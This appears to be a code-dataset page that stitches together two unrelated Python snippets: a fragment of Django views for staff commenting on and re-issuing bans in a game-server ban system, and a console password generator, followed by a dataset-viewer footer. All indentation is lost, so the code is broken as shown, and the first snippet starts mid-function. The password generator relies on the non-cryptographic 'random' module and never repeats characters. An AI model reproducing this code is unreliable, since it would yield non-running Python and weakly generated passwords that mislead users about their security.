# Always return an HttpResponseRedirect after successfully dealing
# with POST data. This prevents data from being posted twice if a
# user hits the Back button.
return HttpResponseRedirect(reverse('bans:index'))
@login_required
def comment(request, bid):
if request.user.is_authenticated and request.user.is_staff:
ban = get_object_or_404(Ban, bid=bid)
if request.method == 'POST':
form = CommentForm(request.POST)
if form.is_valid():
comment = form.save(commit=False)
comment.ban = ban
comment.commenter= request.user
comment.created = int(time.time())
comment.ip = get_client_ip(request)
comment.save()
messages.success(request, "Comment successfully added.")
# Always return an HttpResponseRedirect after successfully dealing
# with POST data. This prevents data from being posted twice if a
# user hits the Back button.
return HttpResponseRedirect(reverse('bans:index'))
@login_required
def reban(request, bid):
if request.user.is_authenticated and request.user.is_staff:
ban = get_object_or_404(Ban, bid=bid)
if request.method == 'POST':
form = RebanForm(request.POST)
if form.is_valid():
newban = form.save(commit=False)
newban.name = ban.name
newban.authid = ban.authid
newban.uid = 0
newban.created = int(time.time())
newban.ends = newban.created + newban.length
newban.aid = request.user.id
newban.adminip = get_client_ip(request)
newban.sid = ban.sid
newban.type = 0
newban.RemovedBy = 0
newban.RemovedOn = 0
if ban.ip:
newban.ip = ban.ip
newban.save()
# Always return an HttpResponseRedirect after successfully dealing
# with POST data. This prevents data from being posted twice if a
# user hits the Back button.
return HttpResponseRedirect(reverse('bans:index'))
|
import string
import random
s1 = string.ascii_lowercase
s2 = string.ascii_uppercase
s3 = string.digits
s4 = string.punctuation
s = []
s.extend(s1)
s.extend(s2)
s.extend(s3)
s.extend(s4)
while True:
plen = int(input("Enter Length Of Password: "))
random.shuffle(s)
password = s[0:plen]
print("Your Password Is: ",end="")
print("".join(password))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.